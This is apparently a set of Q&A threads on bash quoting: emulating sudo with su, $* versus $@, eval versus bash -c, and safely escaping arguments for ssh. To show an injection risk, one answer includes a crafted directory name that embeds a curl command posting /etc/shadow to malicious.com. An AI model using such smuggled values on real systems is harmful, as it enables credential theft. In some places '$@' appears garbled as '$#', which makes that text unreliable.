Emulating sudo's behaviour with su

I'm trying to write a wrapper around su to make it more like sudo, so that su_wrapper foo bar baz == su -c "foo bar baz".
However, I'm not sure how to approach this problem. I came up with this:
su_wrapper ()
{
su -c "$@"
}
However, in the above, only a single argument works; it fails with multiple arguments, since su sees the extra ones as its own arguments.
There's also another problem: since the argument is passed through the shell, I think I must explicitly specify the shell to avoid other problems. Perhaps what I want to do could be expressed in pseudo-bash(!) as su -c 'bash -c "$@"'.
So, how could I make it accept multiple arguments?

Use printf "%q" to escape the parameters so they can safely be reassembled into a single command string:
su_wrapper() {
su -s /bin/bash -c "$(printf "%q " "$@")"
}
Unlike $*, this works even when the parameters contain special characters and whitespace.
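To see what the inner command string looks like, you can run the printf part on its own (the arguments here are just illustrative):
$ printf "%q " touch '/tmp/a file' 'weird$name'
touch /tmp/a\ file weird\$name
The escaped string is re-parsed by the root shell back into the original three words.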

You need $* and not $@:
su_wrapper() {
local IFS=' '
su -c "$*"
}
See the Special Parameters section in the Bash Reference Manual for the difference between $* and $@.
I added local IFS=' ' just in case IFS is set to something else (after reading what $* does, it should be clear why you want to make sure that IFS is set to a space).
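To see the failure mode that local IFS=' ' guards against (an illustrative snippet):
IFS=:
set -- echo hello world
echo "$*"
...which prints echo:hello:world -- the parameters joined with the first character of IFS, no longer a runnable command line.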


Suppose you have the following command stored in a variable:
COMMAND='echo hello'
What's the difference between
$ eval "$COMMAND"
hello
$ bash -c "$COMMAND"
hello
$ $COMMAND
hello
? Why is the last version almost never used if it is shorter and (as far as I can see) does exactly the same thing?
The third form is not at all like the other two -- but to understand why, we need to go into the order of operations when bash is interpreting a command, and look at which of those are followed when each method is in use.
Bash Parsing Stages
Quote Processing
Splitting Into Commands
Special Operator Parsing
Expansions
Word Splitting
Globbing
Execution
Using eval "$string"
eval "$string" follows all the above steps starting from #1. Thus:
Literal quotes within the string become syntactic quotes
Special operators such as >() are processed
Expansions such as $foo are honored
Results of those expansions are split on whitespace into separate words
Those words are expanded as globs if they parse as such and have available matches, and finally the command is executed.
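For instance, all of those stages apply when eval processes a string (the file path here is illustrative):
s='echo "$HOME" > /tmp/eval-demo.out'
eval "$s"
cat /tmp/eval-demo.out
...prints your home directory: the $HOME expansion and the > redirection were both honored as syntax.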
Using sh -c "$string"
...performs the same as eval does, but in a new shell launched as a separate process; thus, changes to variable state, current directory, etc. will expire when this new process exits. (Note, too, that the new shell may be a different interpreter supporting a different language; i.e., sh -c "foo" will not support the same syntax that bash, ksh, zsh, etc. do.)
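For example:
bash -c 'cd /tmp && x=5'
pwd        # unchanged: the cd happened in the child process
echo "$x"  # empty: x died with the child shell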
Using $string
...starts at step 5, "Word Splitting".
What does this mean?
Quotes are not honored.
printf '%s\n' "two words" in such a string is thus split into the words printf, '%s\n', "two and words", with the quote characters kept as literal data, as opposed to the usual/expected behavior where the shell consumes the quotes and two words arrives as a single argument.
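Thus:
s='echo "two words"'
$s
...will emit the following output:
"two words"
...with the quote characters printed as literal data.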
Splitting into multiple commands (on ;s, &s, or similar) does not take place.
Thus:
s='echo foo && echo bar'
$s
...will emit the following output:
foo && echo bar
...instead of the following, which would otherwise be expected:
foo
bar
Special operators and expansions are not honored.
No $(foo), no $foo, no <(foo), etc.
Redirections are not honored.
>foo or 2>&1 is just another word created by string-splitting, rather than a shell directive.
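Thus:
s='echo hello > /tmp/out'
$s
...will emit the following output:
hello > /tmp/out
...and creates no file: > and /tmp/out are just two more arguments handed to echo.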
$ bash -c "$COMMAND"
This version starts up a new bash interpreter, runs the command, and then exits, returning control to the original shell. You don't need to be running bash at all in the first place to do this; you can start a bash interpreter from tcsh, for example. You might also do this from a bash script to start with a fresh environment or to keep from polluting your current environment.
EDIT:
As @CharlesDuffy points out, starting a new bash shell in this way will clear shell variables, but environment variables will be inherited by the spawned shell process.
Using eval causes the shell to parse your command twice. In the example you gave, executing $COMMAND directly or doing an eval are equivalent, but have a look at the answer here to get a more thorough idea of what eval is good (or bad) for.
There are at least times when they are different. Consider the following:
$ cmd="echo \$var"
$ var=hello
$ $cmd
$var
$ eval $cmd
hello
$ bash -c "$cmd"
$ var=world bash -c "$cmd"
world
which shows the different points at which variable expansion is performed. It's even more clear if we do set -x first
$ set -x
$ $cmd
+ echo '$var'
$var
$ eval $cmd
+ eval echo '$var'
++ echo hello
hello
$ bash -c "$cmd"
+ bash -c 'echo $var'
$ var=world bash -c "$cmd"
+ var=world
+ bash -c 'echo $var'
world
We can see here much of what Charles Duffy talks about in his excellent answer. For example, attempting to execute the variable directly prints $var because, by the time the value of cmd was substituted, the parameter-expansion step had already passed, so the resulting $var is never itself expanded; with eval the string is re-parsed from the beginning, so we do get the value of var.
bash -c only inherits exported variables from the parent shell, and since I didn't export var it's not available to the new shell.
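Continuing the same session (with set -x turned off for brevity), exporting var makes it visible to the child shell:
$ export var
$ bash -c "$cmd"
hello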

How to run an arbitrary command in bash -c?

I basically want to do bash -c "$@", but that doesn't work (my command does not get run). While eval "$@" works fine, what's the difference?
I want to do something like this:
myscript:
function run_it() {
bash -c "$@"
}
run_it $@
./myscript MY_VAR=5 make my-target
It's because of the quoting. This should work better:
function run_it() {
bash -c "$*" # Change 1
}
run_it "$@" # Change 2
The reason for change 1: $@ is special when used inside quotes, like "$@". Rather than expanding to a single argument, it expands to a series of quoted arguments: "MY_VAR=5" "make" "my-target". As a result, the -c flag only receives the MY_VAR=5 part, which is executed with make and my-target as arguments $0 and $1 respectively. By using "$*" you do end up with a single string. Note that this still doesn't handle spaces correctly; not sure how to fix that.
The reason for change 2: Here we do want every argument to be quoted individually. This makes sure that arguments aren't being split too soon. It might be pointless until you fix the other spaces issue first though.
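One way to close that whitespace gap is the printf "%q" trick used elsewhere on this page (a sketch, not part of the original answer):
function run_it() {
bash -c "$(printf '%q ' "$@")"
}
run_it "$@"
printf '%q ' re-escapes each argument individually, so the inner bash re-parses the string back into the original words, spaces included.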


What does $"${#// /\\ }" mean in bash?

When I read a Hadoop deploy script, I found the following code:
ssh $HADOOP_SSH_OPTS $slave $"${@// /\\ }"
The "${#// /\\ }" input is a simple shell command (parameter expansion). Why add a $ before this command? What does this $"" mean?
This code is simply buggy: It intends to escape the local script's argument list such that arguments with spaces can be transported over ssh, but it does this badly (missing some kinds of whitespace -- and numerous classes of metacharacters -- in exploitable ways), and uses $"" syntax (performing a translation table lookup) without any comprehensible reason to do so.
The Wrong Thing (aka: What It's Supposed To Do, And How It Fails)
Part 1: Describing The Problem
Passing a series of arguments to SSH does not guarantee that those arguments will come out the way they went in! SSH flattens its argument list to a single string, and transmits only that string to the remote system.
Thus:
# you might try to do this...
ssh remotehost printf '%s\n' "hello world" "goodbye world"
...looks exactly the same to the remote system as:
# but it comes out exactly the same as this
ssh remotehost 'printf %s\n hello world goodbye world'
...thus removing the effect of the quotes. If you want the effect of the first command, what you actually need is something like this:
ssh remotehost "printf '%s\n' \"hello world\" \"goodbye world\""
...where the command, with its quotes, is passed as a single argument to SSH.
Part 2: The Attempted Fix
The syntax "${var//string/replacement}" evaluates to the contents of $var, but with every instance of string replaced with replacement.
The syntax "$#" expands to the full list of arguments given to the current script.
"${#//string/replacement}" expands to the full list of arguments, but with each instance of string in each argument replaced with replacement.
Thus, "${#// /\\ }" expands to the full list of arguments, but with each space replaced with a string that prepends a single backslash to this space.
It thus modifies this:
# would be right as a local command, but not over ssh!
ssh remotehost printf '%s\n' 'hello world' 'goodbye world'
To this:
# ...but with "${@// /\\ }", it becomes this:
ssh remotehost printf '%s\n' 'hello\ world' 'goodbye\ world'
...which SSH munges into this:
# ...which behaves just like this, which actually works:
ssh remotehost 'printf %s\n hello\ world goodbye\ world'
Looks great, right? Except it's not.
Aside: What's the leading $ in $"${@// /\\ }" for?
It's a bug here. It's valid syntax, because $"" has a useful meaning in bash (looking up the string as English text to see if there's a translation to the current user's native language), but there's no legitimate reason to do a translation table lookup here.
Why That Code Is Dangerously Buggy
There's a lot more you need to escape than spaces to make something safe for shell evaluation!
Let's say that you were running the following:
# copy directory structure to remote machine
src=/home/someuser/files
while IFS= read -r -d '' path; do
ssh "$host" "mkdir -p $path"
done < <(find "$src" -type d -printf '%P\0')
Looks pretty safe, right? But let's say that someuser is sloppy about their file permissions (or malicious), and someone does this:
mkdir $'/home/someuser/files/$(curl\t-X\tPOST\t-d\t/etc/shadow\thttp://malicious.com/)/'
Oh, no! Now, if you run that script with root permissions, you'll get your /etc/shadow sent to malicious.com, for them to try to crack your passwords at their leisure -- and the code given in your question won't help, because it only backslash-escapes spaces, not tabs or newlines, and it doesn't do anything about $() or backticks or other characters that can control the shell.
The Right Thing (Option 1: Consuming Stdin)
A safe and correct way to escape an argument list to be transported over ssh follows:
#!/bin/bash
# tell bash to build a quoted string which will, if expanded by bash, evaluate
# to the original arguments to this script, and store it in cmd_str
printf -v cmd_str '%q ' "$@"
# on the remote system, run "bash -s", with the script to run fed on stdin;
# this guarantees that the remote shell is bash, which is what printf %q
# quotes content to be parsed by.
ssh "$slave" "bash -s" <<EOF
$cmd_str
EOF
There are some limitations inherent in this approach -- most particularly, it requires the remote command's stdin to be used for script content -- but it's safe even if the remote /bin/sh doesn't support bash extensions such as $''.
The Right Thing (Option 2: Using Python)
Unlike both bash and ksh's printf %q, the Python standard library's pipes.quote() (moved in 3.x to shlex.quote()) is guaranteed to generate POSIX-compliant output. We can use it as such:
posix_quote() {
python -c 'import pipes, sys; print " ".join([pipes.quote(x) for x in sys.argv[1:]])' "$@"
}
cmd_str=$(posix_quote "$#")
ssh "$slave" "$cmd_str"
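For example (a hypothetical session):
$ posix_quote 'two words' '$(rm -rf /)'
'two words' '$(rm -rf /)'
Each argument comes back wrapped in single quotes, so the remote shell treats it as inert data rather than expandable syntax.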
Arguments to the script which contain whitespace need to be surrounded by quotes on the command line.
The ${@// /\\ } expansion escapes this whitespace so that the word splitting which takes place next keeps the whitespace as part of each argument handed to the remote command.
An example is probably in order. Create a tst.sh containing the line above and make it executable:
echo '#!/bin/bash' > tst.sh
echo 'ssh $HADOOP_SSH_OPTS $slave $"${@// /\\ }"' >> tst.sh
chmod +x tst.sh
Try to run a mkdir command on the remote server, aka slave, for a directory containing spaces, assuming you have access to that server with user id uid:
HADOOP_SSH_OPTS="-l uid" slave=server ./tst.sh mkdir "/tmp/dir with spaces"
Because of the quoting of whitespace taking place, you'll now have a dir with spaces directory in /tmp on the server owned by uid.
Check using ssh uid@server ls /tmp
And if you're in a different country and really want some non-English characters, those are maintained by surrounding the expansion with $"...", aka locale-specific translation.

bash parameter variables in script problem

I have a script I wrote for switching to root or running a command as root without a password. I edited my /etc/sudoers file so that my user [matt] has permission to run /bin/su with no password. This is my script "s" contents:
matt: ~ $ cat ~/bin/s
#!/bin/bash
[ "$1" != "" ] && c='-c'
sudo su $c "$*"
If there are no parameters [simply s], it basically calls sudo su, which goes to root with no password. But if I add parameters, the $c variable equals "-c", which makes su execute a single command.
It works well, except when I need to use spaces. For example:
matt: ~ $ touch file\ with\ spaces
matt: ~ $ s chown matt file\ with\ spaces
chown: cannot access 'file': No such file or directory
chown: cannot access 'with': No such file or directory
chown: cannot access 'spaces': No such file or directory
matt: ~ $ s chown matt 'file with spaces'
chown: cannot access 'file': No such file or directory
chown: cannot access 'with': No such file or directory
chown: cannot access 'spaces': No such file or directory
matt: ~ $ s chown matt 'file\ with\ spaces'
matt: ~ $
How can I fix this?
Also, what's the difference between $* and $@?
Ah, fun with quoting. Usually, the approach @John suggests will work for this: use "$@", and it won't try to interpret (and get confused by) the spaces and other funny characters in your parameters. In this case, however, that won't work because su's -c option expects the entire command to be passed as a single parameter, and then it'll start a new shell which parses the command (including getting confused by spaces and such). In order to avoid this, you actually need to re-quote the parameters within the string you're going to pass to su -c. bash's printf builtin can do this:
#!/bin/bash
if [ $# -gt 0 ]; then
sudo su -c "$(printf "%q " "$@")"
else
sudo su
fi
Let me go over what's happening here:
You run a command like s chown matt file\ with\ spaces
bash parses this into a list of words: "s" "chown" "matt" "file with spaces". Note that at this point the escapes you typed have been removed (although they had their intended effect: making bash treat those spaces as part of a parameter, rather than separators between parameters).
When bash parses the printf "%q " "$@" command in the script, it replaces "$@" with the arguments to the script, with parameter breaks intact. It's equivalent to printf "%q " "chown" "matt" "file with spaces".
printf interprets the format string "%q " to mean "print each remaining parameter in quoted form, with a space after it". It prints: "chown matt file\ with\ spaces ", essentially reconstructing the original command line (it has an extra space on the end, but this turns out not to be a problem; this step is demonstrated just after this list).
This is then passed to sudo as a parameter (since there are double-quotes around the $() construct, it'll be treated as a single parameter to sudo). This is equivalent to running sudo su -c "chown matt file\ with\ spaces ".
sudo runs su, and passes along the rest of the parameter list it got including the fully escaped command.
su runs a shell, and it also passes along the rest of its parameter list.
The shell executes the command it got as an argument to -c: chown matt file\ with\ spaces. In the normal course of parsing it, it'll interpret the unescaped spaces as separators between parameters, and the escaped spaces as part of a parameter, and it'll ignore the extra space at the end.
The shell runs chown, with the parameters "matt" and "file with spaces". This does what you expected.
Isn't bash parsing a hoot?
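To see step 4 in isolation (a hypothetical session):
$ printf "%q " chown matt "file with spaces"
chown matt file\ with\ spaces
...complete with the trailing space; this is exactly the single string handed to su -c.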
"$*" collects all the positional parameters ($1, $2, …) into a single word, separated by one space (more generally, the first character of $IFS). Note that in shell terminology, a word can include any character including spaces: "foo bar" or foo\ bar parses to a single word. For example, if there are three arguments, then "$*" is equivalent to "$1 $2 $3". If there is no argument, then "$*" is equivalent to "" (an empty word).
"$#" is a special syntax that expands to the list of positional parameters, each in its own word. For example, if there are three arguments, then "$#" is equivalent to "$1" "$2" "$3". If there is no argument, then "$#" is equivalent to nothing (an empty list, not a list with one word that is empty).
"$#" is almost always what you want to use, as opposed to "$*", or unquoted $* or $# (the last two are exactly equivalent and perform filename generation (a.k.a. globbing) and word splitting on all the positional parameters).
There's an additional problem, which is that su expects a single shell command as the argument of -c, and you're passing it multiple words. You've had a detailed explanation of getting the quoting right, but let me add advice on how to do it right, which sidesteps the double quoting issues. You may also want to refer to https://unix.stackexchange.com/questions/3063/how-do-i-run-a-command-as-the-system-administrator-root for more background on sudo and su.
sudo already runs a command as root, so there's no need to invoke su. If your script has no arguments, you can just run a shell directly; unless your version of sudo is very old, there's an option for that: sudo -s. So your script can be:
#!/bin/sh
if [ $# -eq 0 ]; then set -- -s; else set -- -- "$@"; fi
exec sudo "$@"
(The else part is to handle the rare case of a command that begins with -.)
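With this version, sudo receives the argument list with word breaks intact, so the failing examples from the question work without any extra escaping (a hypothetical session):
$ s chown matt 'file with spaces'
$ s    # no arguments: runs sudo -s, an interactive root shell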
I wouldn't bother with such a short script though. Running a command as root is unusual and risky enough that typing the three extra characters shouldn't be a problem. Running a shell as root is even more unusual and risky and surely deserves six more characters.
